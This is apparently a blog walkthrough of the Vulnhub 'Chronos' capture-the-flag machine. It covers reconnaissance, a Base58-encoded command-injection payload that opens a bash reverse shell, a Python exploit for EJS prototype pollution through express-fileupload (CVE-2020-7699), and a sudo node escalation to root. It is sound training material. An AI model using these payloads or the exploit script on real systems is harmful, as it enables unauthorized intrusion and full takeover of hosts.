Vulnhub: a detailed walkthrough of the Chronos machine

Chronos

Identifying the target host's IP address

┌──(kali㉿kali)-[~/Vulnhub/Chronos]
└─$ sudo netdiscover -i eth1 -r 192.168.56.0/24
Currently scanning: Finished!   |   Screen View: Unique Hosts                                                              
                                                                                                                            
 3 Captured ARP Req/Rep packets, from 3 hosts.   Total size: 180                                                            
 _____________________________________________________________________________
   IP            At MAC Address     Count     Len  MAC Vendor / Hostname      
 -----------------------------------------------------------------------------
 192.168.56.1    0a:00:27:00:00:0a      1      60  Unknown vendor                                                           
 192.168.56.100  08:00:27:ac:ea:3e      1      60  PCS Systemtechnik GmbH                                                   
 192.168.56.120  08:00:27:cb:b0:0e      1      60  PCS Systemtechnik GmbH                                                   


Using netdiscover, which ships with Kali Linux, the target host's IP address was identified as 192.168.56.120 (192.168.56.1 and 192.168.56.100 belong to the VirtualBox host-only network itself: the host adapter and the built-in DHCP server).

Nmap scan

┌──(kali㉿kali)-[~/Vulnhub/Chronos]
└─$ sudo nmap -sS -sV -sC -p- 192.168.56.120 -oN nmap_full_scan
Starting Nmap 7.93 ( https://nmap.org ) at 2023-01-29 08:02 EST
Nmap scan report for 192.168.56.120
Host is up (0.0018s latency).
Not shown: 65532 closed tcp ports (reset)
PORT     STATE SERVICE VERSION
22/tcp   open  ssh     OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 e4f283a438898d86a5e13176eb9d5fea (RSA)
|   256 415a21c458f22be48a2f3173cefd37ad (ECDSA)
|_  256 9b3428c2b9334b37d501306f87c46b23 (ED25519)
80/tcp   open  http    Apache httpd 2.4.29 ((Ubuntu))
|_http-title: Site doesn't have a title (text/html).
|_http-server-header: Apache/2.4.29 (Ubuntu)
8000/tcp open  http    Node.js Express framework
|_http-title: Site doesn't have a title (text/html; charset=UTF-8).
|_http-open-proxy: Proxy might be redirecting requests
|_http-cors: HEAD GET POST PUT DELETE PATCH
MAC Address: 08:00:27:CB:B0:0E (Oracle VirtualBox virtual NIC)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 20.46 seconds

The Nmap results show three open ports on the target: 22 (SSH, OpenSSH 7.6p1 on Ubuntu), 80 (HTTP, Apache 2.4.29) and 8000 (HTTP, a Node.js Express application).

Getting a shell

Visiting port 80 in a browser, the page source contains the following obfuscated JavaScript:

<script>
    var _0x5bdf=['150447srWefj','70lwLrol','1658165LmcNig','open','1260881JUqdKM','10737CrnEEe','2SjTdWC','readyState','responseText','1278676qXleJg','797116soVTES','onreadystatechange','http://chronos.local:8000/date?format=4ugYDuAkScCG5gMcZjEN3mALyG1dD5ZYsiCfWvQ2w9anYGyL','User-Agent','status','1DYOODT','400909Mbbcfr','Chronos','2QRBPWS','getElementById','innerHTML','date'];(function(_0x506b95,_0x817e36){var _0x244260=_0x432d;while(!![]){try{var _0x35824b=-parseInt(_0x244260(0x7e))*parseInt(_0x244260(0x90))+parseInt(_0x244260(0x8e))+parseInt(_0x244260(0x7f))*parseInt(_0x244260(0x83))+-parseInt(_0x244260(0x87))+-parseInt(_0x244260(0x82))*parseInt(_0x244260(0x8d))+-parseInt(_0x244260(0x88))+parseInt(_0x244260(0x80))*parseInt(_0x244260(0x84));if(_0x35824b===_0x817e36)break;else _0x506b95['push'](_0x506b95['shift']());}catch(_0x3fb1dc){_0x506b95['push'](_0x506b95['shift']());}}}(_0x5bdf,0xcaf1e));function _0x432d(_0x16bd66,_0x33ffa9){return _0x432d=function(_0x5bdf82,_0x432dc8){_0x5bdf82=_0x5bdf82-0x7e;var _0x4da6e8=_0x5bdf[_0x5bdf82];return _0x4da6e8;},_0x432d(_0x16bd66,_0x33ffa9);}function loadDoc(){var _0x17df92=_0x432d,_0x1cff55=_0x17df92(0x8f),_0x2beb35=new XMLHttpRequest();_0x2beb35[_0x17df92(0x89)]=function(){var _0x146f5d=_0x17df92;this[_0x146f5d(0x85)]==0x4&&this[_0x146f5d(0x8c)]==0xc8&&(document[_0x146f5d(0x91)](_0x146f5d(0x93))[_0x146f5d(0x92)]=this[_0x146f5d(0x86)]);},_0x2beb35[_0x17df92(0x81)]('GET',_0x17df92(0x8a),!![]),_0x2beb35['setRequestHeader'](_0x17df92(0x8b),_0x1cff55),_0x2beb35['send']();}
  </script>

The string array at the top of the obfuscated code gives away the hostname chronos.local, the endpoint http://chronos.local:8000/date?format=... and the User-Agent value Chronos, so add a hosts entry for the name:

┌──(kali㉿kali)-[~/Vulnhub/Chronos]
└─$ sudo vim /etc/hosts                                        
[sudo] password for kali: 
                                                                                                                             
┌──(kali㉿kali)-[~/Vulnhub/Chronos]
└─$ cat /etc/hosts
127.0.0.1       localhost
127.0.1.1       kali
::1             localhost ip6-localhost ip6-loopback
ff02::1         ip6-allnodes
ff02::2         ip6-allrouters
192.168.56.120  chronos.local

After adding the host entry, revisiting port 80 now returns a page showing the current date and time.

Loading the page triggers an XHR to http://chronos.local:8000/date?format=..., and the loadDoc function in the script above sets the User-Agent header of that request to Chronos.

Take the value of the format parameter:

4ugYDuAkScCG5gMcZjEN3mALyG1dD5ZYsiCfWvQ2w9anYGyL

and decode it (with CyberChef):

It is Base58; decoding gives:

'+Today is %A, %B %d, %Y %H:%M:%S.'

This looks like an argument to the Linux date command (a date(1) format string, wrapping quotes included), so the server most likely concatenates the decoded value into a shell command line, which makes command injection likely.

So construct the following payload: the legitimate format string, then a semicolon that ends the date command, then a bash reverse shell back to Kali (192.168.56.206:5555):

'+Today is %A, %B %d, %Y %H:%M:%S.';bash -c 'bash -i >& /dev/tcp/192.168.56.206/5555 0>&1'

Base58-encoded:

7946LGv3zFB5KioYxfxvpWVFFRrEUVNmu7KrnxnieiZYNhfowQQoYbo8AHArf3bJbDsh4fm8NeEJaEi83v1ZoNKYYjg587VYzABDNxBNf2tvC8mBQm1qRpdeDqp

Intercept the XHR with Burp Suite, replace the value of the format parameter with the encoded value above (leaving the Chronos User-Agent the script sets in place), forward it, and a reverse shell connects back to the listener:

┌──(kali㉿kali)-[~/Vulnhub/Chronos]
└─$ sudo nc -nlvp 5555                                         
[sudo] password for kali: 
listening on [any] 5555 ...
connect to [192.168.56.206] from (UNKNOWN) [192.168.56.120] 37498
bash: cannot set terminal process group (784): Inappropriate ioctl for device
bash: no job control in this shell
www-data@chronos:/opt/chronos$ id
id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
www-data@chronos:/opt/chronos$ 

Next to /opt/chronos is another version of the application, chronos-v2:

www-data@chronos:/opt/chronos-v2/backend$ cat package.json
cat package.json
{
  "name": "some-website",
  "version": "1.0.0",
  "description": "",
  "main": "server.js",
  "scripts": {
    "start": "node server.js"
  },
  "author": "",
  "license": "ISC",
  "dependencies": {
    "ejs": "^3.1.5",
    "express": "^4.17.1",
    "express-fileupload": "^1.1.7-alpha.3"
  }
}

The express-fileupload ^1.1.7-alpha.3 dependency, combined with the parseNested: true option in server.js below, is vulnerable to prototype pollution via crafted multipart field names (CVE-2020-7699, fixed in express-fileupload 1.1.8). Polluting the outputFunctionName option that EJS reads when it compiles a template turns this into remote code execution. Exploit write-up used:

https://dev.to/boiledsteak/simple-remote-code-execution-on-ejs-web-applications-with-express-fileupload-3325
www-data@chronos:/opt/chronos-v2/backend$ cat server.js
cat server.js
const express = require('express');
const fileupload = require("express-fileupload");
const http = require('http')

const app = express();

// parseNested: true is the dangerous setting: multipart field names such as
// "a.b.c" are expanded into nested objects, and "__proto__" is not filtered
app.use(fileupload({ parseNested: true }));

// EJS renders the templates, so a polluted outputFunctionName reaches the compiler
app.set('view engine', 'ejs');
app.set('views', "/opt/chronos-v2/frontend/pages");

app.get('/', (req, res) => {
   res.render('index')
});

// bound to loopback only: reachable from the www-data shell, not from the network
const server = http.Server(app);
const addr = "127.0.0.1"
const port = 8080;
server.listen(port, addr, () => {
   console.log('Server listening on ' + addr + ' port ' + port);
});

┌──(kali㉿kali)-[~/Vulnhub/Chronos]
└─$ vim exploit.py 
                                                                                                                              
┌──(kali㉿kali)-[~/Vulnhub/Chronos]
└─$ cat exploit.py      
##############################################################
# Run this .py to perform EJS-RCE attack
# referenced from
# https://blog.p6.is/Real-World-JS-1/
# 
# Timothy, 10 November 2020
##############################################################

### imports
import requests

### commands to run on victim machine
cmd = 'bash -c "bash -i &> /dev/tcp/192.168.56.206/9999 0>&1"'

print("Starting Attack...")
### pollute
requests.post('http://127.0.0.1:8080', files = {'__proto__.outputFunctionName': (
    None, f"x;console.log(1);process.mainModule.require('child_process').exec('{cmd}');x")})

### execute command
requests.get('http://127.0.0.1:8080')   #v2 application
print("Finished!")


Upload exploit.py to /tmp on the target. The exploit targets the v2 application, which listens only on localhost (127.0.0.1:8080, see netstat below), so it has to be run from the www-data shell; the address and port 9999 in cmd are the Kali listener.

www-data@chronos:/tmp$ netstat -tunlp
netstat -tunlp
(Not all processes could be identified, non-owned process info
 will not be shown, you would have to be root to see it all.)
Active Internet connections (only servers)
Proto Recv-Q Send-Q Local Address           Foreign Address         State       PID/Program name    
tcp        0      0 127.0.0.1:8080          0.0.0.0:*               LISTEN      -                   
tcp        0      0 127.0.0.53:53           0.0.0.0:*               LISTEN      -                   
tcp        0      0 0.0.0.0:22              0.0.0.0:*               LISTEN      -                   
tcp6       0      0 :::8000                 :::*                    LISTEN      784/node            
tcp6       0      0 :::80                   :::*                    LISTEN      -                   
tcp6       0      0 :::22                   :::*                    LISTEN      -                   
udp        0      0 127.0.0.53:53           0.0.0.0:*                           -                   
udp        0      0 192.168.56.120:68       0.0.0.0:*        
www-data@chronos:/tmp$ wget http://192.168.56.206:8000/exploit.py
wget http://192.168.56.206:8000/exploit.py
--2023-01-29 14:06:02--  http://192.168.56.206:8000/exploit.py
Connecting to 192.168.56.206:8000... connected.
HTTP request sent, awaiting response... 200 OK
Length: 698 [text/x-python]
Saving to: ‘exploit.py’

     0K                                                       100%  205M=0s

2023-01-29 14:06:02 (205 MB/s) - ‘exploit.py’ saved [698/698]

www-data@chronos:/tmp$ 

Start an nc listener on Kali Linux (port 9999), then run the exploit on the target:

www-data@chronos:/tmp$ ls
ls
exploit.py
linpeas.sh
systemd-private-04698ae7bd434dbe9ea6b1417b788fe9-apache2.service-Dmy430
systemd-private-04698ae7bd434dbe9ea6b1417b788fe9-systemd-resolved.service-7S6vMx
systemd-private-04698ae7bd434dbe9ea6b1417b788fe9-systemd-timesyncd.service-gtx4fy
tmux-33
www-data@chronos:/tmp$ python3 exploit.py
python3 exploit.py
Starting Attack...
Finished!
www-data@chronos:/tmp$ 

The reverse shell arrives on Kali. Because the command is executed by the v2 node process, the shell runs as that process's user, imera, who is a member of the sudo group:

┌──(kali㉿kali)-[~/Vulnhub/Chronos]
└─$ sudo nc -nlvp 9999                                         
[sudo] password for kali: 
listening on [any] 9999 ...
connect to [192.168.56.206] from (UNKNOWN) [192.168.56.120] 53042
bash: cannot set terminal process group (841): Inappropriate ioctl for device
bash: no job control in this shell
imera@chronos:/opt/chronos-v2/backend$ id
id
uid=1000(imera) gid=1000(imera) groups=1000(imera),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),108(lxd)
imera@chronos:/opt/chronos-v2/backend$ 

imera@chronos:/opt/chronos-v2/backend$ sudo -l
sudo -l
Matching Defaults entries for imera on chronos:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User imera may run the following commands on chronos:
    (ALL) NOPASSWD: /usr/local/bin/npm *
    (ALL) NOPASSWD: /usr/local/bin/node *

imera@chronos:/opt/chronos-v2/backend$ sudo node -e 'child_process.spawn("/bin/bash", {stdio: [0, 1, 2]})'
id
uid=0(root) gid=0(root) groups=0(root)
cd /root
ls -alh
total 48K
drwx------  8 root root 4.0K Aug  4  2021 .
drwxr-xr-x 23 root root 4.0K Jul 29  2021 ..
-rw-------  1 root root  135 Aug  4  2021 .bash_history
-rw-r--r--  1 root root 3.1K Apr  9  2018 .bashrc
drwx------  2 root root 4.0K Aug  4  2021 .cache
drwx------  3 root root 4.0K Jul 30  2021 .config
drwx------  3 root root 4.0K Aug  4  2021 .gnupg
drwxr-xr-x  3 root root 4.0K Jul 30  2021 .local
drwxr-xr-x  4 root root 4.0K Aug  3  2021 .npm
-rw-r--r--  1 root root  148 Aug 17  2015 .profile
-rw-------  1 root root   41 Aug  3  2021 root.txt
drwx------  2 root root 4.0K Jul 29  2021 .ssh
cat root.txt
YXBvcHNlIHNpb3BpIG1hemV1b3VtZSBvbmVpcmEK


Privilege escalation succeeded and the root flag was obtained. The sudo rule is the root cause here: granting NOPASSWD access to node or npm is equivalent to granting root, since node -e can spawn any program as the invoking user.

posted @ 2023-01-29 22:21  Jason_huawen